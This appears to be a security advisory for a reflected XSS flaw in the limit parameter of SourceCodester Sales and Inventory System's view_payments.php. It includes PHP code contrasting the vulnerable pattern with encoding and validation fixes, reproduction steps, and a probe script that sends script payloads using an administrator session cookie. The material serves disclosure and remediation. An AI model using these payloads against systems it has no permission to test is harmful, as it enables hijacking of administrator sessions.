SourceCodester Sales and Inventory System
cpe:2.3:a:sales_and_inventory_system_project:sales_and_inventory_system:*:*:*:*:*:*:*
- 1.0
A reflected cross-site scripting (XSS) vulnerability exists in SourceCodester Sales and Inventory System version 1.0. The flaw is in view_payments.php, which reflects the value of the limit GET parameter into the page without validating or encoding it, so a remote attacker can inject arbitrary HTML or script through a crafted URL. Because the payload runs in the browser of whoever opens the link, an attacker who gets a logged-in administrator to visit it can steal the session cookie or perform actions in the administrator's session.
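The following is an added illustration of the defect class described above and of two ways to fix it; it is not the project's own code and does not reproduce the real view_payments.php. The function names, the markup, and the use of limit as a page size are assumptions made for the example.

```php
<?php
// Added illustration for the advisory above. This is NOT the project's code:
// the real view_payments.php is not reproduced here. It models the defect
// class described (a GET parameter reflected into HTML unencoded) beside two
// hardened forms. Function names and markup are hypothetical.

// Pull "limit" out of the query array as a string, or fall back to a default.
// Guarding with is_string() also covers a "limit[]=..." array submission.
function raw_limit(array $get, string $default = '10'): string
{
    return is_string($get['limit'] ?? null) ? $get['limit'] : $default;
}

// Vulnerable pattern: the raw query-string value is concatenated into markup.
// A value such as "><script>alert(1)</script> closes the attribute and the
// tag, and the script lands in the page verbatim.
function render_limit_vulnerable(array $get): string
{
    $limit = raw_limit($get);
    return '<input type="text" name="limit" value="' . $limit . '">';
}

// Fix 1: output encoding. The reflected value is HTML-entity encoded with
// ENT_QUOTES, so it can neither break out of the attribute nor open a tag.
function render_limit_encoded(array $get): string
{
    $safe = htmlspecialchars(raw_limit($get), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="limit" value="' . $safe . '">';
}

// Fix 2 (preferred for this parameter): input validation. A page size only
// ever needs to be a small positive integer; anything else is replaced by the
// default before the value is used anywhere (HTML, SQL, redirects).
function validated_limit(array $get, int $default = 10, int $max = 100): int
{
    $limit = filter_var(
        raw_limit($get, ''),
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $max]]
    );
    return $limit === false ? $default : $limit;
}

function render_limit_validated(array $get): string
{
    return '<input type="text" name="limit" value="' . validated_limit($get) . '">';
}

// Constructed demonstration input (run from the CLI: php xss_limit.php).
$attack = ['limit' => '"><script>alert(1)</script>'];
echo "vulnerable: " . render_limit_vulnerable($attack) . PHP_EOL;
echo "encoded:    " . render_limit_encoded($attack) . PHP_EOL;
echo "validated:  " . render_limit_validated($attack) . PHP_EOL;
```

Output encoding is the generic fix for any reflected value, but for a parameter that is only ever a number, rejecting non-integers at the boundary is the stronger choice: it removes the untrusted string from the application entirely rather than making one output site safe.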
Successful exploitation requires a logged-in administrator to open the attacker's URL; the attacker does not need an account. The injected script then runs with the administrator's session: it can read the session cookie where that cookie is not flagged HttpOnly and, regardless of cookie flags, issue authenticated requests to the application on the administrator's behalf.
To reproduce, deploy SourceCodester Sales and Inventory System 1.0 locally and log in as an administrator. In the same browser session, open view_payments.php with the limit parameter set to a script payload, such as an alert call. The page reflects the parameter unencoded and the browser executes the script when the page loads, confirming the reflected XSS.
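As an added reproduction check for the steps above (not part of the SourceCodester project), the script below requests view_payments.php with a uniquely marked payload in limit and reports whether the page returns it verbatim. It assumes the application is reachable at the TARGET URL (default http://localhost/sales_and_inventory) and that SESSION_COOKIE carries the Cookie header of an already logged-in administrator session; both values and the PHPSESSID cookie name are assumptions.

```php
<?php
// Added reproduction check for the advisory above; not the project's code.
// Assumptions (hypothetical): the app is served at TARGET, and SESSION_COOKIE
// holds the Cookie header value of a logged-in administrator session, for
// example "PHPSESSID=...". Run:
//   TARGET=http://host/app SESSION_COOKIE='PHPSESSID=...' php probe.php

$base   = rtrim(getenv('TARGET') ?: 'http://localhost/sales_and_inventory', '/');
$cookie = getenv('SESSION_COOKIE') ?: '';

// A random marker makes the result unambiguous: the page must echo this exact
// tag back, not merely contain the word "script" somewhere in its template.
$marker  = 'xsschk' . bin2hex(random_bytes(4));
$payload = '<script>alert("' . $marker . '")</script>';
$url     = $base . '/view_payments.php?limit=' . rawurlencode($payload);

// Classifies how the body reflects the payload. A verbatim copy means the
// parameter is reflected unencoded; an entity-encoded copy means the output
// site is escaped and the payload is inert as HTML.
function classify_reflection(string $body, string $payload): string
{
    if (strpos($body, $payload) !== false) {
        return 'reflected unencoded (vulnerable)';
    }
    $encoded = htmlspecialchars($payload, ENT_QUOTES, 'UTF-8');
    if (strpos($body, $encoded) !== false) {
        return 'reflected encoded (not exploitable as HTML)';
    }
    return 'not reflected';
}

$ctx = stream_context_create(['http' => [
    'method'        => 'GET',
    'header'        => $cookie !== '' ? "Cookie: $cookie\r\n" : '',
    'ignore_errors' => true,   // keep the body even on a 4xx/5xx status
    'timeout'       => 10,
]]);

$body = @file_get_contents($url, false, $ctx);
if ($body === false) {
    fwrite(STDERR, "request to $url failed\n");
    exit(2);
}

echo "GET $url\n";
echo classify_reflection($body, $payload) . "\n";
```

If the session cookie is missing or expired the application will typically send the request to its login page instead, which the script reports as "not reflected"; confirm the cookie is valid before treating that result as a negative.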